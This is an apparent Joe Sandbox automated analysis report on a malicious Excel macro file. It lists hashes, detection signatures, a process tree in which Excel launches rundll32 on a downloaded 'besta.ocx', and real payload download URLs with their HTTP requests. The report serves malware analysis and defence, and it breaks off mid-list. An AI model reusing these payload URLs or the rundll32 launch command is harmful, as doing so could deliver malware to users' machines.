Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report CU-6431 report.xlsm

Overview

General Information

Sample Name:CU-6431 report.xlsm
Analysis ID:532531
MD5:0630d6c04e8365531eff7998a7fc40c6
SHA1:e4c59420e2024e4f5f5a14e0cd366023d9d0e636
SHA256:bd2212ffe0d388a61a3041f146a70b242fa69eace0c7a5f5fe991126a679eec4
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Contains functionality to detect virtual machines (SLDT)
JA3 SSL client fingerprint seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7136 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6680 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • BackgroundTransferHost.exe (PID: 6680 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7136, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935, ProcessId: 6680

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: CU-6431 report.xlsmVirustotal: Detection: 30%Perma Link
    Source: CU-6431 report.xlsmReversingLabs: Detection: 20%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 162.240.9.126:443 -> 192.168.2.3:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.3:49747 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.3:49744 -> 162.240.9.126:80
    Source: global trafficDNS query: name: standoutglobal.com
    Source: global trafficTCP traffic: 192.168.2.3:49745 -> 162.240.9.126:443
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: standoutglobal.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: vendes.marketing
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /transmigrant/Wplzr/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vendes.marketingConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: src="https://www.facebook.com/tr?id=408176514230511&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Dec 2021 10:35:21 GMTServer: ApacheVary: Accept-Encoding,CookieExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://standoutglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
    Source: EXCEL.EXE, 00000001.00000002.579598601.0000000012DDA000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glideso-
    Source: EXCEL.EXE, 00000001.00000002.577222365.000000000D970000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
    Source: EXCEL.EXE, 00000001.00000002.577171036.000000000D950000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablet
    Source: EXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micro
    Source: EXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microso
    Source: EXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.c
    Source: EXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpString found in binary or memory: http://schemas.o
    Source: EXCEL.EXE, 00000001.00000003.494651295.0000000015B3B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.436061013.0000000015C69000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420404785.0000000015C4A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420387500.0000000015C1A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.436036008.0000000015C39000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.436010972.0000000015C09000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420365504.0000000015BEA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000001.00000003.436010972.0000000015C09000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420365504.0000000015BEA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
    Source: EXCEL.EXE, 00000001.00000003.494651295.0000000015B3B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000001.00000003.436061013.0000000015C69000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420404785.0000000015C4A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420387500.0000000015C1A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.436036008.0000000015C39000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000001.00000002.580925419.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456588846.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435267331.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384287323.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461618662.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439326803.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282330406.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421093734.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491592848.0000000013069000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openxmlf
    Source: EXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpString found in binary or memory: http://schemas.opyFp
    Source: EXCEL.EXE, 00000001.00000002.581690608.00000000159CB000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.c
    Source: EXCEL.EXE, 00000001.00000002.581690608.00000000159CB000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.co
    Source: EXCEL.EXE, 00000001.00000002.581690608.00000000159CB000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com%http://standoutglobal.com/2/MWpqeVgZ/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com/2/MWpqeVgZ/
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: http://vendes.marketing/
    Source: EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmig
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/;
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionloggingPR
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryg
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query~Rw
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiMruMaxLocalItemCount100EnableXL2PBIFullFidelityfalseEnableXL
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/addinstemplateS
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.cortana.ai
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comW
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comp
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/m
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net.
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net5
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net5O
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netF
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net_
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comcent
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/importsV
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000001.00000003.433785669.000000000F6E3000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456171717.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439337436.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580947514.0000000013079000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://api.w.org/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne.
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selectionM
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/z
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://augloop.office.com
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comH
    Source: EXCEL.EXE, 00000001.00000003.420487030.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577929196.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382801866.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433675805.000000000F668000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://cdn.entity.
